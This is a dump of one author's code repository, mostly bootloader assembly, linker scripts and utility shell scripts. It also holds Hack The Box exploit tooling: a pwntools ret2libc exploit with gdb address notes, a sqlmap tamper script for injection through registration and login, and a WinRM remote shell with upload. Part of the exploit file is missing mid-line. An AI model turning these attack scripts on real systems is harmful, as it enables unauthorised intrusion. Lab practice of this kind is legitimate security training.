23 | mv pffmtable hsk.pffmtable
24 | mv shapetable hsk.shapetable
25 | combine_tessdata hsk.
26 |
--------------------------------------------------------------------------------
/raspberry_pi_os/part1/linker.ld:
--------------------------------------------------------------------------------
1 | /* Linker Script: Defines the memory layout */
2 |
3 | ENTRY(_start)
4 |
5 | SECTIONS {
6 | . = 0x80000; /* The kernel code must start at the address 0x80000 for Raspberry Pi. */
7 | .text : { *(.text) } :read_execute /* Code goes here. */
8 |
9 | .rodata : { *(.rodata) } :read_only /* Initialized read-only data go here. */
10 |
11 | .data : { *(.data) } :read_write /* Initialized data go here. */
12 |
13 | /* BSS Section: Uninitialized data (like the stack) go here. */
14 | /* This section is ONLY reserved in memory; nothing is written to the output file. */
15 | .bss : {
16 | . = ALIGN(16);
17 | . = . + 0x10000; /* Reserve 64KB for the stack */
18 | __stack_top = .; /* Set the label __stack_top to the end of the reserved space */
19 | } :read_write
20 |
21 | /* /DISCARD/ section: Get rid of any unused/unwanted sections */
22 | /DISCARD/ : {
23 | *(.note.gnu.build-id)
24 | *(.ARM.exidx)
25 | }
26 | }
27 |
28 | /* Define the loadable segments and set their permissions */
29 | PHDRS {
30 | read_execute PT_LOAD FLAGS(5); /* R + X */
31 | read_only PT_LOAD FLAGS(4); /* R */
32 | read_write PT_LOAD FLAGS(6); /* R + W */
33 | }
34 |
--------------------------------------------------------------------------------
/crypto/xor_encrypted_text.bin:
--------------------------------------------------------------------------------
1 | ��Vr!�aC=5�9R
N2VZ!Y6K� �._��#�^?�=��!e�kP�L0�]7�'�
2 | � Z�|e=-�
I%VP=�'V
&e�-��O9V^7
3 | R�7e�*]YC%VT'� @�6e�9��U(�A%� VC9+�<]YU(�]r
;VC9
kP�O`�Vr�6E�3)�/�Yh4��"�:^� G�U)�]3�?JC;+�3C�O3�E7WsrC!,�;_��2�C7�'Z
5e,�aY )XV|Y&@
4 | <"T?[��3�^7Y8V�r#�9��N2V\"�!R�;*�k\��4�Vr�;\�7e�*G��`�Z"�6AC;6T?[�S%�\ �s@�? �"^�R`�@7�sU� e�"W�O'VZ<�P��-�A7Y V�'7�kG�@.VD:�=��: �.��R`�V+Y!V�71�?Z�O`�Z&�:]C3e�.@
9 | @'��r.;V
r1�.��D9�G �2^C;6T,V�D2�G7�sQ�r$T;@�T$�� �=W�?e�>^�D2VT7�6A�&*�g�
I%VA7
10 | &_�r,�kRYR4�V3�sP
11 | "-�9�Yv)�[r�sX�+e�#R
�)��&�&_�r7�%W�LlVG:�sA�!0�?��R`��=�6��;(�kC�ElVD:�0[C;6T>]�S%�X3�?VC73�%��O`�[7�!JMXO=%��O9V\4Y'[�! T(Z I%�@~Y'[�r�;���Q%�R&�!�
12 | !e�>_�D2�Q>�sG�r$T ]�V.[C>�:]�7=�kR
U!�X~Y Z
1 T;_�H.�V*
sk,�e�"C�D2�V*
s�C9
e�0U`�@r�?@�r1�"E�@,VG=Y5_
13 | "e�9Q�U2�A+Y1Z�!e�%�
I%VW7�!J�& �kC�@)�G7�'��+e�*]�Q5�R&�=TC&-�kP�Q(�A&�+GMr��"@YH3VP3�?V�r(�'_�@"�_;
*�
--------------------------------------------------------------------------------
/linker.ld:
--------------------------------------------------------------------------------
1 | /* Linker Script: Defines the memory layout */
2 |
3 | ENTRY(_start)
4 |
5 | SECTIONS {
6 | . = 0x80000; /* The kernel code must start at the address 0x80000 for Raspberry Pi. */
7 | .text : { *(.text) } :read_execute_segment /* Code goes here. */
8 |
9 | .rodata : { *(.rodata) } :read_only_segment /* Initialized read-only data go here. */
10 |
11 | .data : { *(.data) } :read_write_segment /* Initialized data go here. */
12 |
13 | /* BSS Section: Uninitialized data (like the stack) go here. */
14 | /* This section is ONLY reserved in memory; nothing is written to the output file. */
15 | .bss : {
16 | . = ALIGN(16);
17 | . = . + 0x10000; /* Reserve 64KB for the stack */
18 | __stack_top = .; /* Set the label __stack_top to the end of the reserved space */
19 | } :read_write_segment
20 |
21 | /* /DISCARD/ section: Get rid of any unused/unwanted sections */
22 | /DISCARD/ : {
23 | *(.note.gnu.build-id)
24 | *(.ARM.exidx)
25 | }
26 | }
27 |
28 | /* Define the loadable segments and set their permissions */
29 | PHDRS {
30 | read_execute_segment PT_LOAD FLAGS(5); /* R + X */
31 | read_only_segment PT_LOAD FLAGS(4); /* R */
32 | read_write_segment PT_LOAD FLAGS(6); /* R + W */
33 | }
34 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | This is free and unencumbered software released into the public domain.
2 |
3 | Anyone is free to copy, modify, publish, use, compile, sell, or
4 | distribute this software, either in source code form or as a compiled
5 | binary, for any purpose, commercial or non-commercial, and by any
6 | means.
7 |
8 | In jurisdictions that recognize copyright laws, the author or authors
9 | of this software dedicate any and all copyright interest in the
10 | software to the public domain. We make this dedication for the benefit
11 | of the public at large and to the detriment of our heirs and
12 | successors. We intend this dedication to be an overt act of
13 | relinquishment in perpetuity of all present and future rights to this
14 | software under copyright law.
15 |
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22 | OTHER DEALINGS IN THE SOFTWARE.
23 |
24 | For more information, please refer to
25 |
--------------------------------------------------------------------------------
/hg_git/hg-init-bitbucket-repo:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | if [ "$#" -ne 2 ]; then
4 | echo "Usage: ${0##*/} bitbucket_username(not email) repository_name" >&2
5 | exit 1
6 | fi
7 | username="$1"
8 | reponame="$2"
9 | printf "\nPlease insert Bitbucket password: "
10 | read -s password
11 |
12 | #Create repo using curl and Bitbucket REST API v2.0
13 | curl -X POST -v -u $username:$password -H "Content-Type: application/json" \
14 | https://api.bitbucket.org/2.0/repositories/$username/$reponame \
15 | -d '{"scm": "hg", "is_private": "true", "fork_policy": "no_public_forks" }'
16 |
17 | printf "\nRemote repository https://$username@bitbucket.org/$username/$reponame created\n\n"
18 |
19 | hg init
20 | hg add
21 | hg commit -m "Initial automatic commit $(date)"
22 |
23 | echo \[paths\] >> .hg/hgrc
24 | echo default = https://$username@bitbucket.org/$username/$reponame >> .hg/hgrc
25 | echo \[ui\] >> .hg/hgrc
26 | echo username = $username >> .hg/hgrc
27 | echo \[auth\] >> .hg/hgrc
28 | echo bb.prefix = https://bitbucket.org >> .hg/hgrc
29 | echo bb.username = $username >> .hg/hgrc
30 |
31 | #If you want to store the password uncomment the next line
32 | #echo bb.password = $password >> .hg/hgrc
33 |
34 | hg push https://$username:$password@bitbucket.org/$username/$reponame
35 |
36 | printf "\nFinished\n\n"
37 |
--------------------------------------------------------------------------------
/hacking/HTB/Enterprise/pwn_lcars.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # Author: Alamot
3 | import time
4 | import struct
5 | from pwn import *
6 | from subprocess import call
7 |
8 | #context(os = 'linux', arch = 'i386')
9 | DEBUG = False
10 | RHOST = "10.10.10.61"
11 | RPORT = 32812
12 |
13 | if DEBUG:
14 | context.log_level = 'debug'
15 | else:
16 | context.log_level = 'info'
17 |
18 | def conv(num):
19 | return struct.pack(" *) 0xf7e4c060
40 |
41 | (gdb) print &exit
42 | $2 = ( *) 0xf7e3faf0
43 |
44 | find &system,+9999999,"/bin/sh"
45 | 0xf7f70a0f #<---- THIS NOT GOOD. IT HAS NEWLINE (0a) #
46 |
47 | # So we search for plain 'sh'
48 | (gdb) find &system,+9999999,"sh"
49 | 0xf7f6ddd5
50 | 0xf7f6e7e1
51 | 0xf7f70a14
52 | 0xf7f72582
53 | '''
54 |
--------------------------------------------------------------------------------
/os/part2/stage2/bootstage2.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Initialized data------------------------------------------------------------
6 | stage2_message dw 19
7 | db 'Entering Stage 2...'
8 | longmode_supported_message dw 23
9 | db 'Long mode is supported.'
10 | longmode_not_supported_message dw 27
11 | db 'Long mode is not supported.'
12 |
13 | ;---Code------------------------------------------------------------------------
14 | Stage2_entrypoint:
15 | ; Print 'Entering Stage 2...' message
16 | mov si, stage2_message
17 | call Real_mode_println
18 |
19 | ; Check if long mode is supported
20 | call Is_longmode_supported
21 | test eax, eax
22 | jz .long_mode_not_supported
23 | mov si, longmode_supported_message
24 | call Real_mode_println
25 |
26 | ; Enable Gate A20
27 | call Enable_A20
28 | ; Prepare paging
29 | call Prepare_paging
30 | ; Remap PIC
31 | call Remap_PIC
32 | ; Enter long mode
33 | call Enter_long_mode
34 |
35 | .long_mode_not_supported:
36 | mov si, longmode_not_supported_message
37 | call Real_mode_println
38 | .halt: hlt ; Infinite loop.
39 | jmp .halt ; (It prevents from going off in memory and executing junk).
40 |
41 |
42 | ; Include
43 | %include "stage2/a20.asm"
44 | %include "stage2/paging.asm"
45 | %include "stage2/pic.asm"
46 | %include "stage2/longmode.asm"
47 |
48 |
--------------------------------------------------------------------------------
/os/part3/stage2/bootstage2.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 | stage2_message dw 19
5 | db 'Entering Stage 2...'
6 | longmode_supported_message dw 23
7 | db 'Long mode is supported.'
8 | longmode_not_supported_message dw 27
9 | db 'Long mode is not supported.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 | Stage2_entrypoint:
13 | ; Print 'Entering Stage 2...' message
14 | mov si, stage2_message
15 | call Real_mode_println
16 |
17 | ; Check if long mode is supported
18 | call Is_longmode_supported
19 | test eax, eax
20 | jz .long_mode_not_supported
21 | mov si, longmode_supported_message
22 | call Real_mode_println
23 |
24 | ; Enable Gate A20
25 | call Enable_A20
26 | ; Prepare paging
27 | call Prepare_paging
28 | ; Remap PIC
29 | call Remap_PIC
30 | ; Enter long mode
31 | call Enter_long_mode
32 |
33 | .long_mode_not_supported:
34 | mov si, longmode_not_supported_message
35 | call Real_mode_println
36 | .halt: hlt ; Infinite loop.
37 | jmp .halt ; (It prevents us from going off in memory and executing junk).
38 |
39 |
40 | ; Include
41 | %include "stage2/a20.asm"
42 | %include "stage2/paging.asm"
43 | %include "stage2/pic.asm"
44 | %include "stage2/longmode.asm"
45 |
46 |
--------------------------------------------------------------------------------
/os/part4/stage2/bootstage2.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 | stage2_message dw 19
5 | db 'Entering Stage 2...'
6 | longmode_supported_message dw 23
7 | db 'Long mode is supported.'
8 | longmode_not_supported_message dw 27
9 | db 'Long mode is not supported.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 | Stage2_entrypoint:
13 | ; Print 'Entering Stage 2...' message
14 | mov si, stage2_message
15 | call Real_mode_println
16 |
17 | ; Check if long mode is supported
18 | call Is_longmode_supported
19 | test eax, eax
20 | jz .long_mode_not_supported
21 | mov si, longmode_supported_message
22 | call Real_mode_println
23 |
24 | ; Enable Gate A20
25 | call Enable_A20
26 | ; Prepare paging
27 | call Prepare_paging
28 | ; Remap PIC
29 | call Remap_PIC
30 | ; Enter long mode
31 | call Enter_long_mode
32 |
33 | .long_mode_not_supported:
34 | mov si, longmode_not_supported_message
35 | call Real_mode_println
36 | .halt: hlt ; Infinite loop.
37 | jmp .halt ; (It prevents us from going off in memory and executing junk).
38 |
39 |
40 | ; Include
41 | %include "stage2/a20.asm"
42 | %include "stage2/paging.asm"
43 | %include "stage2/pic.asm"
44 | %include "stage2/longmode.asm"
45 |
46 |
--------------------------------------------------------------------------------
/os/part5/stage2/bootstage2.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Initialized data------------------------------------------------------------
6 | stage2_message dw 19
7 | db 'Entering Stage 2...'
8 | longmode_supported_message dw 23
9 | db 'Long mode is supported.'
10 | longmode_not_supported_message dw 27
11 | db 'Long mode is not supported.'
12 |
13 | ;---Code------------------------------------------------------------------------
14 | Stage2_entrypoint:
15 | ; Print 'Entering Stage 2...' message
16 | mov si, stage2_message
17 | call Real_mode_println
18 |
19 | ; Get memory map
20 | call Get_E820_map
21 |
22 | ; Check if long mode is supported
23 | call Is_longmode_supported
24 | test eax, eax
25 | jz .long_mode_not_supported
26 | mov si, longmode_supported_message
27 | call Real_mode_println
28 |
29 | ; Enable Gate A20
30 | call Enable_A20
31 | ; Prepare paging
32 | call Prepare_paging
33 | ; Remap PIC
34 | call Remap_PIC
35 | ; Enter long mode
36 | call Enter_long_mode
37 |
38 | .long_mode_not_supported:
39 | mov si, longmode_not_supported_message
40 | call Real_mode_println
41 | .halt: hlt ; Infinite loop.
42 | jmp .halt ; (It prevents us from going off in memory and executing junk).
43 |
44 |
45 | ; Include
46 | %include "stage2/e280_mapping.asm"
47 | %include "stage2/a20.asm"
48 | %include "stage2/paging.asm"
49 | %include "stage2/pic.asm"
50 | %include "stage2/longmode.asm"
51 |
52 |
--------------------------------------------------------------------------------
/graphics/SutherlandHodgman/Windows/SutherlandHodgman/SutherlandHodgman.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31729.503
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SutherlandHodgman", "SutherlandHodgman.vcxproj", "{90409165-B065-4780-91B7-0A9B2DE8B5BA}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x64.ActiveCfg = Debug|x64
17 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x64.Build.0 = Debug|x64
18 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x86.ActiveCfg = Debug|Win32
19 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x86.Build.0 = Debug|Win32
20 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x64.ActiveCfg = Release|x64
21 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x64.Build.0 = Release|x64
22 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x86.ActiveCfg = Release|Win32
23 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {328559D7-EEB7-43F9-A123-0A0E88A26B65}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/winrm/winrm_shell_with_upload.rb:
--------------------------------------------------------------------------------
1 | require 'winrm-fs'
2 |
3 | # Author: Alamot
4 | # To upload a file type: UPLOAD local_path remote_path
5 | # e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
6 |
7 | conn = WinRM::Connection.new(
8 | endpoint: 'https://IP:PORT/wsman',
9 | transport: :ssl,
10 | user: 'username',
11 | password: 'password',
12 | :no_ssl_peer_verification => true
13 | )
14 |
15 | file_manager = WinRM::FS::FileManager.new(conn)
16 |
17 |
18 | class String
19 | def tokenize
20 | self.
21 | split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
22 | select {|s| not s.empty? }.
23 | map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
24 | end
25 | end
26 |
27 |
28 | command=""
29 |
30 | conn.shell(:powershell) do |shell|
31 | until command == "exit\n" do
32 | output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
33 | print(output.output.chomp)
34 | command = gets
35 | if command.start_with?('UPLOAD') then
36 | upload_command = command.tokenize
37 | print("Uploading " + upload_command[1] + " to " + upload_command[2])
38 | file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
39 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
40 | end
41 | command = "echo `nOK`n"
42 | end
43 |
44 | output = shell.run(command) do |stdout, stderr|
45 | STDOUT.print(stdout)
46 | STDERR.print(stderr)
47 | end
48 | end
49 | puts("Exiting with code #{output.exitcode}")
50 | end
51 |
52 |
--------------------------------------------------------------------------------
/hacking/HTB/Nightmare/nightmare_tamper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Author: Alamot
3 | import re
4 | import requests
5 | from lib.core.enums import PRIORITY
6 | from random import sample
7 | __priority__ = PRIORITY.NORMAL
8 |
9 | def dependencies():
10 | pass
11 |
12 | def new_cookie(payload):
13 | session = requests.Session()
14 | paramsPost = {"register":"Register", "pass":"pass", "user":payload}
15 | headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0","Referer":"http://10.10.10.66/register.php","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"}
16 | response = session.post("http://10.10.10.66/register.php", data=paramsPost, headers=headers)
17 | result = re.search('PHPSESSID=(.*?);', response.headers['Set-Cookie'])
18 | PHPSESSID = result.group(1)
19 |
20 | paramsPost = {"login":"Login", "pass":"pass", "user":payload}
21 | headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0","Referer":"http://10.10.10.66/index.php","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"}
22 | response = session.post("http://10.10.10.66/index.php", data=paramsPost, headers=headers)
23 |
24 | return "PHPSESSID="+PHPSESSID
25 |
26 | def tamper(payload, **kwargs):
27 | headers = kwargs.get("headers", {})
28 | headers["Cookie"] = new_cookie(payload)
29 | #print(headers, payload)
30 | return payload
31 |
--------------------------------------------------------------------------------
/os/part2/stage1/print.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | newline dw 2
6 | db 13,10 ; \r\n
7 |
8 | stage1_message dw 17
9 | db 'Stage 1 finished.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 |
13 | Real_mode_print:
14 | ;*********************************************************************************;
15 | ; Prints a string (in real mode) ;
16 | ;---------------------------------------------------------------------------------;
17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ;
18 | ;*********************************************************************************;
19 | push ax
20 | push cx
21 | push si
22 | mov cx, word [si] ; first 16 bits = the number of characters in the string
23 | add si, 2
24 | .string_loop: ; print all the characters in the string
25 | lodsb
26 | mov ah, 0eh
27 | int 10h
28 | loop .string_loop, cx
29 | pop si
30 | pop cx
31 | pop ax
32 | ret
33 |
34 |
35 | Real_mode_println:
36 | ;***********************************************************;
37 | ; Prints a string (in real mode) and a newline (\r\n) ;
38 | ;-----------------------------------------------------------;
39 | ; si: pointer to string ;
40 | ; (first 16 bits = the number of characters in the string.) ;
41 | ;***********************************************************;
42 | push si
43 | call Real_mode_print
44 | mov si, newline
45 | call Real_mode_print
46 | pop si
47 | ret
48 |
--------------------------------------------------------------------------------
/os/part3/stage1/print.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | newline dw 2
6 | db 13,10 ; \r\n
7 |
8 | stage1_message dw 17
9 | db 'Stage 1 finished.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 |
13 | Real_mode_print:
14 | ;*********************************************************************************;
15 | ; Prints a string (in real mode) ;
16 | ;---------------------------------------------------------------------------------;
17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ;
18 | ;*********************************************************************************;
19 | push ax
20 | push cx
21 | push si
22 | mov cx, word [si] ; first 16 bits = the number of characters in the string
23 | add si, 2
24 | .string_loop: ; print all the characters in the string
25 | lodsb
26 | mov ah, 0eh
27 | int 10h
28 | loop .string_loop, cx
29 | pop si
30 | pop cx
31 | pop ax
32 | ret
33 |
34 |
35 | Real_mode_println:
36 | ;***********************************************************;
37 | ; Prints a string (in real mode) and a newline (\r\n) ;
38 | ;-----------------------------------------------------------;
39 | ; si: pointer to string ;
40 | ; (first 16 bits = the number of characters in the string.) ;
41 | ;***********************************************************;
42 | push si
43 | call Real_mode_print
44 | mov si, newline
45 | call Real_mode_print
46 | pop si
47 | ret
48 |
--------------------------------------------------------------------------------
/os/part4/stage1/print.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | newline dw 2
6 | db 13,10 ; \r\n
7 |
8 | stage1_message dw 17
9 | db 'Stage 1 finished.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 |
13 | Real_mode_print:
14 | ;*********************************************************************************;
15 | ; Prints a string (in real mode) ;
16 | ;---------------------------------------------------------------------------------;
17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ;
18 | ;*********************************************************************************;
19 | push ax
20 | push cx
21 | push si
22 | mov cx, word [si] ; first 16 bits = the number of characters in the string
23 | add si, 2
24 | .string_loop: ; print all the characters in the string
25 | lodsb
26 | mov ah, 0eh
27 | int 10h
28 | loop .string_loop, cx
29 | pop si
30 | pop cx
31 | pop ax
32 | ret
33 |
34 |
35 | Real_mode_println:
36 | ;***********************************************************;
37 | ; Prints a string (in real mode) and a newline (\r\n) ;
38 | ;-----------------------------------------------------------;
39 | ; si: pointer to string ;
40 | ; (first 16 bits = the number of characters in the string.) ;
41 | ;***********************************************************;
42 | push si
43 | call Real_mode_print
44 | mov si, newline
45 | call Real_mode_print
46 | pop si
47 | ret
48 |
--------------------------------------------------------------------------------
/os/part1/stage1/print.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | newline dw 2
6 | db 13,10 ; \r\n
7 |
8 | stage1_message dw 17
9 | db 'Stage 1 finished.'
10 |
11 | ;---Code------------------------------------------------------------------------
12 |
13 | Real_mode_print:
14 | ;*********************************************************************************;
15 | ; Prints a string (in real mode) ;
16 | ;---------------------------------------------------------------------------------;
17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ;
18 | ;*********************************************************************************;
19 | push ax
20 | push cx
21 | push si
22 | mov cx, word [si] ; first 16 bits = the number of characters in the string
23 | add si, 2
24 | .string_loop: ; print all the characters in the string
25 | lodsb
26 | mov ah, 0eh
27 | int 10h
28 | loop .string_loop, cx
29 | pop si
30 | pop cx
31 | pop ax
32 | ret
33 |
34 |
35 | Real_mode_println:
36 | ;***********************************************************;
37 | ; Prints a string (in real mode) and a newline (\r\n) ;
38 | ;-----------------------------------------------------------;
39 | ; si: pointer to string ;
40 | ; (first 16 bits = the number of characters in the string.) ;
41 | ;***********************************************************;
42 | push si
43 | call Real_mode_print
44 | mov si, newline
45 | call Real_mode_print
46 | pop si
47 | ret
48 |
--------------------------------------------------------------------------------
/share_internet/share_internet_simpe.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | if [ "$#" -ne 2 ]; then
3 | echo "Usage: $0 WAN_interface LAN_interface" >&2
4 | exit 1
5 | fi
6 | WAN="$1"
7 | LAN="$2"
8 | echo Trying to share $WAN internet connection with $LAN ...
9 | # Kill previous dnsmasq to avoid conflicts
10 | sudo killall dnsmasq
11 | # Set the IP of our would-be LAN gateway
12 | sudo ifconfig $LAN down
13 | sudo ifconfig $LAN 10.0.0.1 netmask 255.255.255.0 broadcast 10.0.0.255
14 | sudo ifconfig $LAN up
15 | # Or using the ip command
16 | # ip link set $LAN down
17 | # ip addr add 10.0.0.1/24 broadcast 10.0.0.255 dev $LAN
18 | # ip link set $LAN up
19 |
20 | # Inform the kernel that IP forwarding is OK:
21 | echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
22 | for f in /proc/sys/net/ipv4/conf/*/rp_filter ; do echo 1 | sudo tee $f > /dev/null; done
23 | echo 1 | sudo tee /proc/sys/net/ipv4/ip_dynaddr > /dev/null
24 |
25 | # Flush the current ΝΑΤ rules:
26 | sudo iptables -t nat -F
27 | sudo iptables -t nat -X
28 |
29 | # Accept traffic via ports 67 (dhcp) and 53 (dns) from LAN
30 | sudo iptables -I INPUT -i $LAN -j ACCEPT
31 | sudo iptables -I INPUT -p udp --dport 67 -i $LAN -j ACCEPT
32 | sudo iptables -I INPUT -p udp --dport 53 -i $LAN -j ACCEPT
33 | sudo iptables -I INPUT -p tcp --dport 53 -i $LAN -j ACCEPT
34 |
35 | # Add the rules for NAT:
36 | sudo iptables -t nat -A POSTROUTING -o $WAN -j MASQUERADE
37 | sudo iptables -A FORWARD -i $LAN -o $WAN -j ACCEPT
38 | sudo iptables -A FORWARD -i $WAN -o $LAN -m state --state RELATED,ESTABLISHED -j ACCEPT
39 |
40 | # dnsmasq provides the dhcp and dns servers
41 | sudo dnsmasq -i $LAN --dhcp-range=$LAN,10.0.0.100,10.0.0.250,72h
42 | echo Internet connection sharing is READY.
43 |
--------------------------------------------------------------------------------
/os/part5/stage1/print.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Initialized data------------------------------------------------------------
6 |
7 | newline dw 2
8 | db 13,10 ; \r\n
9 |
10 | stage1_message dw 17
11 | db 'Stage 1 finished.'
12 |
13 | ;---Code------------------------------------------------------------------------
14 |
15 | Real_mode_print:
16 | ;*********************************************************************************;
17 | ; Prints a string (in real mode) ;
18 | ;---------------------------------------------------------------------------------;
19 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ;
20 | ;*********************************************************************************;
21 | push ax
22 | push cx
23 | push si
24 | mov cx, word [si] ; first 16 bits = the number of characters in the string
25 | add si, 2
26 | .string_loop: ; print all the characters in the string
27 | lodsb
28 | mov ah, 0eh
29 | int 10h
30 | loop .string_loop, cx
31 | pop si
32 | pop cx
33 | pop ax
34 | ret
35 |
36 |
37 | Real_mode_println:
38 | ;***********************************************************;
39 | ; Prints a string (in real mode) and a newline (\r\n) ;
40 | ;-----------------------------------------------------------;
41 | ; si: pointer to string ;
42 | ; (first 16 bits = the number of characters in the string.) ;
43 | ;***********************************************************;
44 | push si
45 | call Real_mode_print
46 | mov si, newline
47 | call Real_mode_print
48 | pop si
49 | ret
50 |
--------------------------------------------------------------------------------
/os/part3/stage2/longmode.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Code------------------------------------------------------------------------
4 | Is_longmode_supported:
5 | ;********************************************************************;
6 | ; Check if Long mode is supported ;
7 | ;--------------------------------------------------------------------;
8 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. ;
9 | ;********************************************************************;
10 | mov eax, 0x80000000 ; Test if extended processor info in available.
11 | cpuid
12 | cmp eax, 0x80000001
13 | jb .not_supported
14 |
15 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001,
16 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit
17 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags).
18 |
19 | jz .not_supported ; If it's not set, there is no long mode.
20 | ret
21 |
22 | .not_supported:
23 | xor eax, eax
24 | ret
25 |
26 |
27 | Enter_long_mode:
28 | ;********************************************************************;
29 | ; Enter long mode ;
30 | ;********************************************************************;
31 | mov edi, PAGING_DATA; Point edi at the PAGING_DATA.
32 | mov eax, 10100000b ; Set the PAE and PGE bit.
33 | mov cr4, eax
34 | mov edx, edi ; Point CR3 at the PML4.
35 | mov cr3, edx
36 | mov ecx, 0xC0000080 ; Read from the EFER MSR.
37 | rdmsr
38 | or eax, 0x00000100 ; Set the LME bit.
39 | wrmsr
40 | mov ebx, cr0 ; Activate long mode
41 | or ebx,0x80000001 ; by enabling paging and protection simultaneously.
42 | mov cr0, ebx
43 | lgdt [GDT.Pointer] ; Load GDT.Pointer.
44 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache.
45 |
--------------------------------------------------------------------------------
/os/part4/stage2/longmode.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Code------------------------------------------------------------------------
4 | Is_longmode_supported:
5 | ;********************************************************************;
6 | ; Check if Long mode is supported ;
7 | ;--------------------------------------------------------------------;
8 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. ;
9 | ;********************************************************************;
10 | mov eax, 0x80000000 ; Test if extended processor info in available.
11 | cpuid
12 | cmp eax, 0x80000001
13 | jb .not_supported
14 |
15 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001,
16 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit
17 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags).
18 |
19 | jz .not_supported ; If it's not set, there is no long mode.
20 | ret
21 |
22 | .not_supported:
23 | xor eax, eax
24 | ret
25 |
26 |
27 | Enter_long_mode:
28 | ;********************************************************************;
29 | ; Enter long mode ;
30 | ;********************************************************************;
31 | mov edi, PAGING_DATA; Point edi at the PAGING_DATA.
